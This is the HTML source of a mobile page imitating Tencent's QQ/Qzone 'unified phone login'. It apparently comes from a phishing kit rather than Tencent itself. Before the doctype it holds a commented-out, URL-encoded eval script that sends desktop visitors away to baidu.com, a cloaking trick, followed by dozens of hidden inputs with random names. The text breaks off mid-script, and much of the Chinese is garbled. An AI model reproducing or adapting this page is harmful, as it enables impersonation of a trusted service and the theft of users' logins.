<body>
    <!-- <script type="text/javascript">
        eval(unescape('%20function%20IsPC%28%29%20%7B%0A%09%09var%20userAgentInfo%20%3D%20navigator.userAgent%3B%0A%09%09var%20Agents%20%3D%20%5B%22Android%22%2C%20%22iPhone%22%2C%22SymbianOS%22%2C%20%22Windows%20Phone%22%2C%20%22iPod%22%5D%3B%0A%09%09var%20flag%20%3D%20true%3B%0A%09%09for%20%28var%20v%20%3D%200%3B%20v%20%3C%20Agents.length%3B%20v++%29%20%7B%0A%09%09%09if%20%28userAgentInfo.indexOf%28Agents%5Bv%5D%29%20%3E%200%29%20%7B%0A%09%09%09%09flag%20%3D%20false%3B%0A%09%09%09%09break%3B%0A%09%09%09%7D%0A%09%09%7D%0A%09%09if%28window.screen.width%3E%3D768%29%7B%0A%09%09%09%20flag%20%3D%20true%3B%0A%09%09%7D%0A%09%09return%20flag%3B%0A%09%7D%0A%09var%20isM%20%3D%20false%3B%09if%28%21IsPC%28%29%29%7B%0A%09%09window.addEventListener%28%22deviceorientation%22%2Cfunction%28%29%7BisM%3Dtrue%7D%2C%20false%29%3B%0A%09%7D%0A%09setTimeout%28%27if%28%21isM%29%7Blocation.href%3D%22http%3A//www.baidu.com%22%7D%27%2C1000%29%3B'));
    </script> -->
</body>
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />
<input type="TDT2LZAJXS" name="TDT2LZAJXS952BJ8JV1UA78Y5Q" value="TDT2LZAJXS952BJ8JV1UA78Y5Q" style="display:none;" />


<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <script src="https://open.mobile.qq.com/sdk/qqapi.js?_bid=152" type="text/javascript" charset="utf-8"></script>
    <script type="text/javascript">
        mqq.ui.setTitleButtons({
            left: {
                title: "����",
                callback: function () {

                }
            },
            right: {
                title: "ǰ��",
                callback: function () {

                }
            }
        })
        document.title = unescape('\u7edf\u4e00\u624b\u673a\u767b\u5f55');
    </script>
    <style type="text/css">
        html {
            height: 100%
        }

        body {
            font-size: 16px;
            background: #eee;
            height: 100%
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #aaa
        }

        input::-ms-input-placeholder,
        textarea::-ms-input-placeholder {
            color: #aaa
        }

        input:focus {
            outline: 0
        }

        .content {
            margin: 0 auto;
            width: 320px;
            height: 500px;
            position: relative
        }

        #error_tips {
            position: absolute;
            top: 0;
            z-index: 100;
            display: none;
            opacity: .95;
            width: 100%
        }

        #error_tips #error_tips_content {
            position: relative;
            padding: 16px 0 24px 24px;
            border-radius: 5px;
            background-color: #525c5f;
            height: 28px
        }

        #error_tips #error_tips_content #error_icon {
            position: absolute;
            top: 18px;
            display: inline-block;
            width: 24px;
            height: 24px;
            background: url("/style/8/images/info.png") no-repeat 0 0
        }

        #error_tips #error_tips_content #error_message {
            display: inline-block;
            line-height: 28px;
            font-size: 14px;
            color: white;
            padding: 0 0 0 28px
        }

        #error_message a,
        #error_message a:visited {
            color: #f15a22
        }

        @media(-webkit-min-device-pixel-ratio:2),
        (min-resolution:192dpi),
        (min-resolution:2dppx) {
            #error_tips #error_tips_content #error_icon {
                background: url("/style/8/images/info@2x.png") no-repeat 0 0;
                background-size: 24px 24px
            }
        }

        .login {
            margin: 0 auto;
            padding-top: 30px
        }

        .q_login {
            margin: 0 auto;
            width: 290px;
            overflow: hidden;
            text-align: center;
            margin-bottom: 40px
        }

        .inputstyle {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            width: 273px;
            height: 44px;
            color: #000;
            border: 0;
            background: 0;
            padding-left: 15px;
            font-size: 16px;
            -webkit-appearance: none
        }

        .logo {
            height: 100px;
            width: 244px;
            margin: 0 auto;
            margin-bottom: 20px;
            background-size: 244px 100px
        }

        .header {
            display: inline-block;
            height: 97px;
            width: 96px;
            text-align: center;
            position: relative
        }

        .header img {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 10px;
            left: 16px
        }

        .header .img_out {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 9px;
            left: 15px;
            border: solid 1px #c6dbe8;
            border-radius: 4px;
            -webkit-box-shadow: 1px 1px 13px #6e6e6e
        }

        .nick {
            display: inline-block;
            text-align: center;
            position: absolute;
            top: 80px;
            left: 0;
            height: 20px;
            line-height: 18px;
            vertical-align: middle
        }

        .del_touch_icon {
            display: none;
            width: 30px;
            height: 30px;
            position: absolute;
            left: 60px;
            top: 0;
            z-index: 1
        }

        .del_icon {
            display: block;
            width: 24px;
            height: 22px;
            background: url("/style/8/images/android_logo_v1.png") no-repeat -68px 0;
            border-radius: 11px
        }

        #web_login {
            width: 290px;
            margin: 0 auto
        }

        #g_list {
            background: #fff;
            height: 89px;
            border-radius: 4px
        }

        #g_u,
        #g_p {
            position: relative
        }

        #g_u {
            border-bottom: 1px solid #eaeaea
        }

        .txt_default {
            position: absolute;
            top: 12px;
            left: 10px;
            color: #b3b3b3
        }

        .del_touch {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            position: absolute;
            right: 0;
            display: block;
            height: 44px;
            width: 48px;
            z-index: 1
        }

        .del_u {
            display: none;
            position: absolute;
            left: 15px;
            top: 13px;
            height: 18px;
            width: 18px;
            background-color: #aaa;
            border-radius: 9px;
            background: url("/style/8/images/android_logo_v1.png") no-repeat -117px -2px
        }

        #auto_login {
            height: 24px;
            margin: 15px 0;
            color: #246183;
            position: relative
        }

        #auto_login .wording {
            position: absolute;
            left: 40px;
            line-height: 24px;
            height: 24px;
            font-size: 14px
        }

        #remember {
            position: absolute;
            left: 14px;
            top: 5px;
            cursor: pointer;
            z-index: 1;
            opacity: .01
        }

        #remember:checked+.checkbox {
            background: #146fdf url("/style/8/images/checked.png") 1px 1px;
            border-color: #146fdf
        }

        #remember+.checkbox {
            display: inline-block;
            width: 21px;
            height: 21px;
            position: absolute;
            left: 9px;
            top: 1px;
            border: 1px solid #9abbe3;
            background: 0;
            border-radius: 11px
        }

        #go,
        #onekey {
            width: 290px;
            height: 44px;
            line-height: 44px;
            background: #146fdf;
            border: 0;
            border-radius: 4px;
            color: #fff;
            font-size: 16px;
            text-align: center;
            margin-top: 15px;
            display: block
        }

        #onekey {
            background: #146fdf;
            display: none
        }

        #onekey.weak,
        #go.weak {
            background-color: #e7e7e7;
            color: #146fdf;
            border: 1px solid #9abbe3;
            height: 42px
        }

        #switch {
            width: 290px;
            margin: 0 auto
        }

        #switch #swicth_login {
            width: 288px;
            height: 42px;
            line-height: 44px;
            border: solid 1px #9abbe3;
            border-radius: 5px;
            background: #e7e7e7;
            margin-top: 10px;
            text-align: center;
            font-size: 16px;
            color: #146fdf
        }

        #switch #zc_feedback {
            width: 290px;
            position: relative;
            margin-top: 15px;
            overflow: hidden
        }

        #switch #zc,
        #switch #forgetpwd {
            color: #246183;
            line-height: 14px;
            font-size: 14px;
            padding: 15px 10px
        }

        #switch #zc {
            float: right;
            margin-right: -10px
        }

        #switch #forgetpwd {
            float: left;
            margin-left: -10px
        }

        .tansparent {
            background: 0
        }

        #q_login_title {
            height: 32px;
            line-height: 22px;
            margin-bottom: 20px;
            position: relative
        }

        #q_login_logo {
            background: url("/style/8/images/android_logo_v1.png") no-repeat -44px 0;
            width: 22px;
            height: 22px;
            position: absolute;
            left: 0
        }

        #q_login_tips {
            position: absolute;
            left: 30px;
            top: 0;
            color: #246183
        }

        #vcode {
            margin: 0 auto;
            padding-top: 40px;
            display: none
        }

        #vcode #vcode_tips {
            display: block;
            width: 290px;
            height: 20px;
            line-height: 20px;
            margin: 0 auto;
            margin-bottom: 15px;
            color: #77838d
        }

        #vcode #vcode_area {
            position: relative;
            margin: 0 auto;
            width: 290px;
            height: 70px;
            border-radius: 5px;
            border: solid 1px #b8b8b8;
            background: #fff
        }

        #vcode #vcode_img {
            position: absolute;
            left: 3px;
            width: 140px;
            height: 70px
        }

        #vcode #vcode_input {
            position: absolute;
            top: -1px;
            left: 145px;
            width: 145px;
            height: 70px;
            border: 1px solid #9d9d9d;
            background: 0;
            -webkit-appearance: none;
            border-top-right-radius: 5px;
            border-bottom-right-radius: 5px;
            line-height: 28px;
            font-size: 28px;
            -webkit-box-shadow: inset 0 0 10px #ccc
        }

        #vcode #input_tips {
            position: absolute;
            top: 5px;
            left: 150px;
            display: block;
            width: 135px;
            height: 50px;
            color: #b3b3b3;
            z-index: 1;
            padding-top: 8px
        }

        #vcode #submit {
            width: 288px;
            height: 22px;
            padding: 10px 0;
            background: #7ec82c;
            border: 0;
            border-radius: 5px;
            color: #fff;
            font-size: 22px;
            text-align: center;
            margin: 0 auto;
            margin-top: 35px
        }

        .copyright {
            text-align: center;
            color: #8a949d;
            font-size: 10px;
            margin-top: 15px;
            font-family: Helvetica
        }

        .copyright .en {
            line-height: 20px
        }

        .copyright .chs {
            line-height: 20px
        }

        .mode_webapp .ui_topbar .topbar_btn b,
        .mode_webapp .ui_topbar .topbar_btn_left b {
            background-image: url("/style/8/images/bg_btn_back.png");
            background-position: bottom right;
            background-size: 105px;
            width: 6px;
            height: 32px;
            float: left
        }

        .ui_topbar h3,
        .ui_topbar .topbar_title {
            font-size: 18px
        }

        .ui_topbar {
            border-bottom: 1px solid #b6b6b6;
            border-top: 2px solid #df242a;
            background-color: #d9d9d9;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#ebebeb), to(#d9d9d9));
            background-image: -webkit-linear-gradient(top, #ebebeb, #d9d9d9);
            background-image: linear-gradient(to bottom, #ebebeb, #d9d9d9);
            height: 40px;
            line-height: 40px;
            text-align: center;
            position: relative
        }

        .lay_header {
            height: auto !important;
            width: 100%
        }

        .mode_webapp .ui_topbar {
            color: #fff;
            background-color: #c32d32;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#fe444a), to(#c32d32));
            background-image: -webkit-linear-gradient(top, #fe444a, #c32d32);
            background-image: linear-gradient(to bottom, #fe444a, #c32d32);
            border-bottom: 1px solid #700d00;
            border-top: 0 none;
            top: 0;
            left: 0;
            width: 100%
        }

        .mode_webapp .ui_topbar .topbar_btn_left {
            display: block;
            position: absolute;
            left: 10px;
            top: 5px
        }

        .mode_webapp .ui_topbar .topbar_btn span,
        .mode_webapp .ui_topbar .topbar_btn_left span {
            float: left;
            display: inline-block;
            height: 32px;
            line-height: 30px;
            color: #fff;
            background-image: url("/style/8/images/bg_btn_back.png");
            background-size: 105px;
            padding-left: 10px;
            padding-right: 4px
        }

        .mode_webapp .ui_topbar .topbar_btn_left span {
            background-image: url("/style/8/images/bg_btn_back.png");
            background-position: left -32px;
            background-size: 105px;
            padding-left: 17px
        }

        .mode_webapp .ui_topbar {
            box-shadow: 0 0 5px #333
        }

        .skin-2 .ui_topbar {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .skin-2 .ui_topbar {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .skin-2 .ui_topbar .topbar_btn span,
        .skin-2 .ui_topbar .topbar_btn_left span,
        .skin-2 .ui_topbar .topbar_btn b,
        .skin-2 .ui_topbar .topbar_btn_left b {
            background-image: url("/style/8/images/bg_btn_back_black@2x.png");
            background-size: 105px
        }

        .new_vcode {
            display: none;
            width: 100%;
            height: 100%;
            overflow: hidden
        }
    </style>
    <style type="text/css">
        .logo {
            background-image: url(http://qzonestyle.gtimg.cn/qzone/phone/style/img/ptlogin-logo.png)
        }
    </style>
    <script>var ptui_daid = encodeURIComponent("5"), ptui_appid = encodeURIComponent("549000929"), ptui_domain = encodeURIComponent("qq.com"), ptui_regmaster = encodeURIComponent(""), ptui_lang = encodeURIComponent("2052"), ptui_pt_version = encodeURIComponent("10153"), ptui_version = encodeURIComponent("201203081004"), ptui_style = encodeURIComponent("9"), ptui_noAuth = "1", g_href = "", ptui_pt_qzone_sig = "0", ptui_pt_light = "0", ptui_pt_ttype = "1", ptui_pt_3rd_aid = encodeURIComponent("0"), ptui_enablePwd = encodeURIComponent(""), ptui_target = encodeURIComponent("_top"), ptui_low_login = parseInt("0", 10) || 0, ptui_low_login_hour = parseInt("0", 10) || 720, ptui_kf_csimc = encodeURIComponent("0"), ptui_kf_csnum = encodeURIComponent("0"), ptui_kf_authid = encodeURIComponent("0"), ptui_defuin = "", ptui_lockuin = parseInt("0"); 1 == ptui_daid && (ptui_daid = 0); </script>
    <style type="text/css">
        #yd-notify {
            position: fixed;
            top: 0;
            left: 0;
            width: 80%;
            margin-left: 8.8%;
            border-radius: .4rem;
            background-color: rgba(40, 40, 40, .85);
            line-height: .28rem;
            font-size: .86rem;
            color: #fff;
            padding: 1.46rem .34rem;
            display: none;
            -webkit-animation: yd-kf-down-in .2s linear forwards;
            animation: yd-kf-down-in .2s linear forwards;
            word-break: break-all;
            text-align: center;
            z-index: 2000;
        }
    </style>
</head>

<body>
    <link rel="stylesheet" href="http://qzonestyle.gtimg.cn/qzone/phone/style/login.css">

    <div id="guide" class="dl-guide" style="display:none;">
        <!-- wifi�����л�,3G/2GĬ��û���� -->
        <header class="" id="guideBG">
            <p class="intro">��ʡ���������ٴ�ͼ�����Ա���
                <br>�ÿ����ѡ�Ȩ������</p>
            <b class="cover"></b>
        </header>
        <p class="action">
            <b id="guideJump" class="item blue">���ֻ���</b>
            <b id="guideSkip" class="item">�������ʴ�����</b>
        </p>
    </div>
    <script type="text/javascript">
        (function () {
            var $ = function (id) { return document.getElementById(id) };
            var on = function (el, event, callback) { el.addEventListener(event, callback, false) };
            var getCookie = function (name) {
                var r = new RegExp("(?:^|;+|\\s+)\s*" + name + "=([^;]*)"), m = document.cookie.match(r);
                return !m ? "" : decodeURIComponent(m[1]);
            }
            var setCookie = function (name, value, domain, path, hour) {
                if (hour) {
                    var expire = new Date;
                    expire.setTime(expire.getTime() + 36E5 * hour)
                }
                document.cookie = name + "=" + value + "; " + (hour ? "expires=" + expire.toGMTString() + "; " : "") + (path ? "path=" + path + "; " : "path=/; ") + (domain ? "domain=" + domain + ";" : "domain=" + domainPrefix + ";");
                return true
            }
            var pv = function (domain, path) {
                var refer = document.referrer.match(/http:\/\/([^/]+)\/([^\?#]+)/);
                var param = [
                    'dm+=' + escape(domain),
                    'url+=' + escape(path),
                    'rdm+=' + escape(refer ? refer[1] : ''),
                    'rurl+=' + escape(refer ? refer[2] : ''),
                    'pgv_pvid+=' + getId(),
                    'sds+=' + Math.random()
                ];
                img = new Image();
                img.src = "http://pingfore.qq.com/pingd?cc=-&ct=-&java=1&lang=-&pf=-&scl=-&scr=-&tt=-&tz=-8&vs=3.3&flash=&" + param.join("&")
            }
            var getId = function () {
                var t, d, h, f;
                t = document.cookie.match(/(?:^|;+|\s+)pgv_pvid=([^;]*)/i);
                if (t && t.length && t.length > 1) {
                    d = t[1];
                } else {
                    d = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;
                    document.cookie = "pgv_pvid=" + d + "; path=/; domain=qq.com; expires=Sun, 18 Jan 2038 00:00:00 GMT;";
                }
                h = document.cookie.match(/(?:^|;+|\s+)pgv_info=([^;]*)/i);
                if (!h) {
                    f = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;
                    document.cookie = "pgv_info=ssid=s" + f + "; path=/; domain=qq.com;";
                }
                return d;
            }
            /*layer switch*/
            var hasShown = getCookie('guide2');
            var refer = document.referrer || '';
            var url = location.href;
            /*�����߼����ֶ�������ַ��refer�ջ����http://m.qzone.com*/
            //  if(refer && refer != 'http://m.qzone.com/' && refer != 'http://m.qzone.com'){
            //      hasShown = true;
            //  }
            //�ҳ�ɵ�
            if (refer && refer.indexOf('qzs.qq.com') > 0) {
                hasShown = true;
            }
            //΢��,qq�ɵ�
            if (url.indexOf('5758') > 0 || url.indexOf('5757') > 0) {
                hasShown = true;
            } else if (url.indexOf('6456') > 0 || url.indexOf('17636') > 0 || url.indexOf('17615') > 0 || url.indexOf('22578') > 0 || url.indexOf('22174') > 0) {
                hasShown = true;
            }

            //MSIEҲ��չʾ
            var ua = navigator.userAgent;
            if (ua.match(/MSIE/)) {
                hasShown = true;
            }
            if (ua.indexOf('MicroMessenger') > 0) {
                hasShown = true;
            }

            if (!hasShown) {
                $('guide').style.display = '';
                if (navigator.connection && navigator.connection.type == '2') {
                    $('guideBG').setAttribute('class', 'wifi');
                }
                var close = function () {
